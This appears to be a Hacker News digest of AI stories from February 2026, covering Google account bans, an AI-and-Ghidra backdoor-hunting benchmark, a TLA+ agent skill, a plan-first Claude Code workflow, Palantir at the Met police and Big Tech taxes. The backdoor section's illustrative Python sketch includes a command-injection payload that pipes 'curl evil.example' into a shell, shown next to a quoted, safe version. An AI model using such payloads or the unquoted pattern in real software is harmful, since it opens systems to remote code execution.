AI Submissions for Sun Feb 22 2026
Google restricting Google AI Pro/Ultra subscribers for using OpenClaw
Submission URL | 738 points | by srigi | 634 comments
Google AI Ultra/“Antigravity” users report sudden account bans after third‑party OAuth
- Multiple paying subscribers say their AI Ultra/Antigravity access was abruptly restricted (403 “service disabled”), often right after connecting Gemini via third‑party tools like OpenClaw/OpenCode. No warning or clear violation notice preceded the lockouts.
- Support has been described as unresponsive or circular: users were bounced between Google Cloud and Google One, with some saying they’ve waited days or weeks without resolution.
- One user shared a formal response from Google stating an internal investigation found use of credentials in the third‑party “open claw” tool violated Terms of Service by “using Antigravity servers to power a non‑Antigravity product.” Google called it a zero‑tolerance issue and said suspensions won’t be reversed.
- Frustration is high among annual prepay customers; several report canceling other Google services, considering chargebacks, or migrating to alternatives (e.g., Claude Code). Others suggest creating a new account as a workaround.
- A recurring pain point: the in‑app “Report Issue” path isn’t usable once you’re locked out.
Takeaway: Third‑party OAuth into paid AI accounts appears risky under Google’s ToS enforcement; users are calling for clearer rules, pre‑ban warnings, and a working appeal path before permanent suspensions.
Here is a summary of the discussion:
- Exploit vs. Legitimate Use: A contentious debate emerged regarding the nature of the third-party tools (like "OpenClaw"). Some commenters viewed the usage as a clear "exploit" or "script kiddie" behavior—likening it to sharing a parking lot access code with the entire internet until the lot jams—arguing that handing OAuth tokens to third-party apps is a major security lapse. Conversely, others argued these are technically paying customers trying to utilize a product they purchased, and that Google unilaterally changed the Terms of Service to punish legitimate demand that their official apps didn't support.
- The "Digital Death Penalty": The strongest criticism focused on the severity of the punishment. Users argued that permanently banning an entire Google Workspace or personal account (cutting off Gmail, Drive, and GCP) for a violation in a specific AI service introduces a "novel business risk." Commenters described the fear of accidentally violating obscure rules and losing their entire digital life as "insane," with some comparing it to a disproportionate "video game ban" applied to critical infrastructure.
- Google's Response & Infrastructure: A comment linked to a Google employee’s statement claiming the bans were triggered because the "massive increase in malicious usage" was degrading service quality for everyone. However, critics countered that this reflects a failure in Google's quota management; rather than banning paying customers ($200+/month), the system should simply enforce rate limits, API caps, or "backpressure" to manage load without nuking accounts.
- Market Implications: The incident is driving sentiment toward diversifying away from relying on a single "megacorp" for all digital services. Users noted this situation serves as a strong advertisement for self-hosted/local LLMs, as the risk of arbitrary lockouts makes proprietary cloud dependencies increasingly unattractive for business-critical workflows.
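The rate-limit alternative commenters describe can be sketched as a per-account token bucket (a toy illustration of the general technique, not Google's actual quota system; all names here are invented):

```python
import time

class TokenBucket:
    """Per-account token bucket: throttle bursts instead of banning."""

    def __init__(self, rate: float, capacity: float):
        self.rate = rate          # tokens refilled per second
        self.capacity = capacity  # maximum burst size
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self, cost: float = 1.0) -> bool:
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False  # backpressure: reject or queue; the account stays active

bucket = TokenBucket(rate=1.0, capacity=5)
results = [bucket.allow() for _ in range(10)]
print(results)  # roughly: first 5 allowed, the rest throttled
```

Under a scheme like this, a runaway third-party client gets 429-style throttling while the subscription itself stays intact.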
We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them
Submission URL | 234 points | by jakozaur | 92 comments
AI + Ghidra vs. backdoored binaries: promising, but not production-ready
- What they did: A team hid backdoors in compiled executables (around 40 MB) and asked AI agents, wired into Ghidra and standard RE tooling, to find them—no source code allowed. They’ve released an open benchmark and tasks as BinaryAudit (github.com/quesmaOrg/BinaryAudit), with a results dashboard covering false positives, tool proficiency, and a Pareto view of cost-effectiveness.
- Why it matters: Real-world attacks increasingly swap or taint binaries and firmware (e.g., recent NPM supply-chain malware, the Notepad++ hijack, and findings in trains/solar inverters). Many targets are closed-source; binary analysis is the only line of defense.
- How hard is this? Compilers strip structure and symbols, then optimize aggressively, so reverse engineering relies on disassembly and decompilation (e.g., Ghidra) back to pseudo-C. The post walks through an example that ultimately funnels user-controlled bytes into a system() call.
- Key results:
- Best model (Claude Opus 4.6) caught “relatively obvious” backdoors in small/mid-size binaries only 49% of the time.
- Most models showed high false-positive rates, flagging clean binaries.
- Conclusion: Today’s AI agents can sometimes spot real red flags but are far from reliable for standalone binary vetting.
- Takeaway: Treat LLMs as noisy triage helpers alongside traditional RE tools and human experts; don’t rely on them for final judgments on shipped binaries or firmware.
Links: BinaryAudit results and benchmark details on the project site; tasks are open source at github.com/quesmaOrg/BinaryAudit.
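The vulnerable pattern the write-up describes (user-controlled bytes flowing into a system() call) can be illustrated with a small sketch; this is Python standing in for the decompiled pseudo-C, with invented function names:

```python
import shlex

def log_banner_unsafe(user_bytes: bytes) -> str:
    # Backdoor-style flaw: attacker-controlled bytes are spliced
    # directly into a shell command line (what system() would run).
    return "logger -t sshd " + user_bytes.decode("latin-1")

def log_banner_safe(user_bytes: bytes) -> str:
    # Quoting keeps the payload inert as a single argument.
    return "logger -t sshd " + shlex.quote(user_bytes.decode("latin-1"))

payload = b"hello; curl evil.example | sh"
print(log_banner_unsafe(payload))  # the ';' would start a second command
print(log_banner_safe(payload))    # payload stays one quoted argument
```

Spotting exactly this kind of taint path, from input bytes to a command sink, is what the benchmark asks agents to do across a stripped 40 MB binary.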
Based on the discussion, users analyzed the effectiveness of combining LLMs with reverse engineering (RE) tools like Ghidra. While skeptics noted that current models struggle with complex logic and obfuscation, others shared specific workflows and tools that have proven successful for tasks like file format parsing and basic cracking.
Methodology and Context

Much of the debate focused on the "fairness" and realism of the benchmark tasks.
- Documentation vs. Autonomy: Several users argued that restricting AI from accessing tool documentation (to test "autonomy") is unrealistic. User btsrsandnmxs suggested that just as human specialists use manuals, AI performance improves significantly when the context window is "stuffed" with Ghidra tutorials and API docs.
- Obfuscation: Commenter 7777332215 noted that while simple string obfuscation lowers success rates, LLMs excel at detecting pattern-based anomalies. kslv added that asking a model to RE obfuscated code causes it to "spin in circles," but instructing it to explicitly identify obfuscation works better.
Benchmark Critique: The Dropbear Task
User cmx performed a deep dive into one of the benchmark tasks (a backdoored Dropbear SSH server).
- Heuristics vs. Understanding: cmx observed that Claude identified the correct function (svr_auth_password) but likely did so based on heuristics (it is a standard target for backdoors) rather than by successfully analyzing the assembly.
- Human vs. AI: Interestingly, cmx admitted to initially failing the same task manually by analyzing the wrong function, highlighting that while the AI might be guessing, the task itself is difficult for humans without recognized patterns.
Tooling and Workflows
- Ghidra-CLI: User kslv shared their tool ghidra-cli, a REPL interface designed for LLMs, claiming it was "insanely effective" for reverse engineering the Altium file format (Delphi). They argued models are particularly good at writing parsers from scratch.
- The "Swiss Army Knife" Approach: User btxpldr described using agents not for final judgments but to automate high-level grunt work (mapping attack surfaces, generating architecture diagrams), allowing the human to focus on deep investigation. They warned of the "productivity trap" of spending more time prompting the AI than doing the work manually.
- Cracks vs. Backdoors: User hereme888 claimed success using Claude Opus and Ghidra plugins to fully reverse engineer software cracks, though they acknowledged this is different from detecting state-level hidden backdoors.
Concerns
- Training Data: Users questioned whether models were simply recalling solutions to known "crackmes" from their training data. However, kslv noted that performance remains consistent even on challenges released days or weeks ago.
- Performance: jkzr noted that some Python bindings (PyGhidra) are too slow, making CLI approaches more viable for agent loops.
Show HN: TLA+ Workbench skill for coding agents (compat. with Vercel skills CLI)
Submission URL | 40 points | by youio | 4 comments
agent-skills (GitHub) — A brand-new repo from younes-io popped up on HN. From the snippet we only see the GitHub chrome (6 stars, 0 forks) and no README details, so specifics are unclear. Judging by the name, it may be a collection of reusable “skills” for AI agents, but consider this a placeholder to watch—if you’re tracking agent tooling, bookmark it and check back as the project fleshes out.
agent-skills
The creator (y) clarified the project’s purpose in the comments, describing it as a suite of skills for coding-agent workflows. The repository currently features a tlaplus-workbench skill designed to help agents convert natural language designs into TLA+ configuration files, run the TLC model checker, and summarize counterexamples. The author provided npx commands for users to try the tool and requested feedback on its utility for protocol and state-machine modeling. Discussion briefly touched on whether the tool references official language grammar for PlusCal and the potential for using formal TLA+ specifications alongside real code to improve LLM reasoning.
How I use Claude Code: Separation of planning and execution
Submission URL | 932 points | by vinhnx | 568 comments
TL;DR: After 9 months using Claude Code as a primary dev tool, the author’s winning tactic is strict separation of planning and execution. Never let the model write code until you’ve reviewed and approved a written plan. This human-in-the-loop workflow reduces wasted effort, preserves architectural control, and outperforms prompt-fix-repeat and agent loops—often with fewer tokens.
How it works:
- Phase 1 — Research: Force a deep read of the relevant code, then require a persistent artifact (research.md). Use loaded language (“deeply,” “intricacies,” “go through everything”) so the model doesn’t skim. This surfaces misunderstandings early and prevents the costliest failure mode: correct code that violates the surrounding system (caches, ORM conventions, duplicated logic, etc.).
- Phase 2 — Plan: Ask for plan.md with real file paths, concrete code snippets, approach trade-offs, and references to actual source. Ignore built-in plan modes; a markdown file is editable, reviewable, and part of the repo.
- Reference-first: When possible, supply a high-quality OSS implementation as a template. The model is dramatically better adapting a concrete reference than inventing from scratch.
- Annotation cycle: You edit plan.md inline—adding corrections, constraints, domain knowledge—then send it back for updates. Repeat until satisfied. Short notes (“not optional”) or longer business-context blocks both work.
- Then and only then: Generate a focused TODO, implement against the approved plan, and iterate with feedback.
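A hypothetical skeleton of the loop described above (ask_model and review are stand-ins for the model call and the human annotation pass; nothing here is Claude Code's actual API):

```python
def plan_first_loop(task, ask_model, review, max_rounds=5):
    """Plan-first workflow: no code is generated until a written
    plan has survived human review."""
    artifacts = {}
    # Phase 1 - Research: force a persistent artifact.
    artifacts["research.md"] = ask_model(
        f"Deeply read the code relevant to: {task}. "
        "Go through everything; write research.md.")
    # Phase 2 - Plan: real file paths, snippets, trade-offs.
    plan = ask_model(
        "Using research.md, write plan.md with real file paths, "
        "code snippets, and approach trade-offs.")
    # Annotation cycle: human edits the plan inline, model revises.
    for _ in range(max_rounds):
        approved, annotated = review(plan)
        if approved:
            break
        plan = ask_model("Revise plan.md per annotations:\n" + annotated)
    artifacts["plan.md"] = plan
    # Then and only then: implement against the approved plan.
    artifacts["diff"] = ask_model("Generate a TODO from plan.md and implement it.")
    return artifacts

# Stub model and reviewer so the skeleton runs as-is.
echo = lambda prompt: f"<output for: {prompt.splitlines()[0]}>"
approve_all = lambda plan: (True, plan)
result = plan_first_loop("add request caching", echo, approve_all)
print(sorted(result))  # the three artifacts of the loop
```

The point of the structure is that every phase boundary produces a reviewable artifact, so the human veto happens before tokens are spent on implementation.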
Why it wins:
- Prevents garbage-in/garbage-out mistakes
- Keeps you in charge of architecture and trade-offs
- Produces more reliable changes with less churn and lower token spend
If you’ve found AI codegen flaky on non-trivial tasks, this plan-first, artifact-driven loop is the fix.
Based on the discussion, here is a summary of the comments:
Validation of the "Plan-First" Approach Many users validated the author's central thesis: that LLMs are "assumption engines" that tend to fill gaps with industry standards which may not fit specific project needs.
- Commenters agreed that LLMs rarely fail on simple syntax, but frequently fail on "invisible assumptions," architectural constraints, and system invariants.
- One user described the written plan not just as documentation, but as a "test harness" for constraints (latency, concurrency, memory budgets) that helps catch architecture-level mistakes before code is generated.
- The consensus was that forcing a plan effectively stops the model from "reverting to the mean" and brings hidden assumptions to the surface.
Debate: "Magic Words" vs. Architecture A significant portion of the discussion focused on the author's advice to work "loaded language" (e.g., "deeply," "intricacies") into prompts to improve performance.
- The Skeptics: Some users dismissed this as "magical thinking" or "superstition," comparing it to performing rituals for a "random word machine." They argued that unless there are rigorous statistics, this is just anthropomorphizing the model.
- The Theorists: Others offered technical explanations for why this works. One theory is that these words trigger specific weights in the Attention mechanism, associating the prompt with high-quality training data (like detailed StackOverflow explanations or expert tutorials).
- The MoE Theory: Several users debated whether this forces Mixture of Experts (MoE) models to route the query to a "smarter" expert path, though others argued that MoE routing is based on token type rather than semantic complexity in that specific way.
- Research: One user pointed to academic papers regarding "emotional stimuli" in prompts (e.g., telling the model a task is vital) as proof that phrasing impacts output quality.
Workflow and Agents There was technical discussion on how to implement this loop:
- Users debated the specific benefit of sequential prompts vs. "agents." The consensus leaned toward sequential steps to avoid "context pollution"—where a long-running agent session gets confused by potential hallucinations or previous step details.
- One user warned against building "black box" agent swarms, advocating instead for a single-agent orchestrator with strict logging and human-reviewed "pull requests" or checkpoints.
Counterpoints
- Directly contradicting the author's experience, one user shared a horror story where Claude Code burned $20 in 30 minutes looping on a simple Rust syntax/API hallucination, suggesting that LLMs can and do still fail on basic implementation details.
Met police using AI tools supplied by Palantir to flag officer misconduct
Submission URL | 37 points | by helsinkiandrew | 6 comments
The UK’s Metropolitan Police is piloting Palantir’s AI to sift internal HR-style signals—sickness, absences, overtime—in order to flag potential misconduct patterns among its 46,000 staff. The Met says the system only surfaces patterns and humans make the calls; the Police Federation calls it “automated suspicion,” warning workload or illness could be misread as wrongdoing. The move lands amid Palantir’s expanding UK public-sector footprint (NHS data platform, MoD deal) and political scrutiny over transparency and influence, prompting an MP to ask, “Who is watching Palantir?” Labour’s recent policing paper backs rapid, “responsible” AI rollout across all 43 forces with £115m over three years, signaling this kind of tooling could scale beyond the Met. Palantir says its software is improving public services; critics see a fresh layer of opaque workplace surveillance in a force already under fire for cultural failings.
Discussion Summary:
Commenters focus heavily on the irony of the Police Federation’s complaints, pointing out that while the union decries "automated suspicion" and opaque tools when applied to officers, police departments rarely hesitate to deploy similar surveillance against the general public. One user draws a parallel to the anime Ghost in the Shell: Stand Alone Complex, speculating that the Met might eventually find itself investigating Palantir's own interests. Others note a perceived recent increase in positive PR stories surrounding Palantir, viewing them with skepticism, while some readers report hitting a paywall.
Amazon, Meta, Alphabet report plunging tax bills thanks to AI and tax changes
Submission URL | 44 points | by epistasis | 40 comments
Big Tech’s 2025 US tax bills tumble on AI buildout and new expensing rules
- What happened: Amazon, Meta, and Alphabet reported sharply lower 2025 US tax bills, citing last year’s pro-business tax changes in Trump’s “One Big Beautiful Bill” plus massive AI/data center investments.
- The numbers:
- Amazon: ~$9B (2024) → $1.2B (2025) federal tax; total payments this year $2.75B. Domestic profit ~$90B (up more than 40%).
- Meta: ~$9.6B → $2.8B federal tax. Domestic profit $79.6B (+20%).
- Alphabet: $21.1B → $13.8B combined federal+state tax. Domestic profit $143.6B (+32%).
- Why taxes fell: New deductions/credits for depreciation, capital investment, R&D, interest; most notably 100% expensing for new/updated factories. Much of the benefit is timing—big deferrals now, higher taxes later.
- Deferred taxes: Amazon >$11B; Meta >$18B; Alphabet ~$8B.
- Company stance: “We’re following the rules.” Amazon says it invested $340B in the US in 2025 (including AI). Meta’s CFO flagged “substantial cash tax savings.”
- Criticism: ITEP estimates AMZN/META/GOOG plus Tesla “avoided” nearly $50B versus the 21% statutory rate; Tesla paid zero federal tax for 2025. More disclosures from large firms still to come.
Why it matters
- Near-term boost to earnings and cash flow could fuel more AI capex and shareholder returns; some of it reverses as deferrals unwind.
- Strong incentives for US-based data center and factory buildouts likely pull AI infrastructure timelines forward.
- Optics risk: plunging taxes amid soaring profits may invite policy backlash and future rule changes.
Discussion Summary:
The comment section evolved into a broad debate covering tax mechanics, wealth inequality, and the efficiency of government spending.
- Wealth Inequality vs. Incentives: A heated philosophical dispute emerged regarding wealth accumulation. Radical suggestions were made to cap personal wealth at specific limits (ranging from $200k to $1M) to solve inequality, though these were met with skepticism regarding their economic feasibility, the definition of "luxury," and the destruction of incentives.
- Tax Burden Realities: Users corrected the misconception that large corporations fund the majority of the government. Commenters pointed out that individual income taxes and payroll taxes make up the vast majority of federal revenue, while corporate taxes constitute a much smaller fraction (roughly 10%).
- Accounting Mechanics: There was a specific discussion regarding the rules of writing off expenses. Users clarified that taxes are levied on profit rather than revenue, and noted recent changes to Section 174 which require software R&D expenses to be amortized over years rather than immediately expensed (though the summaries in the article highlight capital expensing for physical infrastructure like data centers).
- The California Debate: The conversation drifted into a debate about California as a case study for high taxation. While some users criticized the state for squandering tax revenue on inefficient programs, others defended the cost as the price for labor rights, environmental protections, and a higher quality of life, attributing high costs to restrictive zoning laws rather than taxes alone.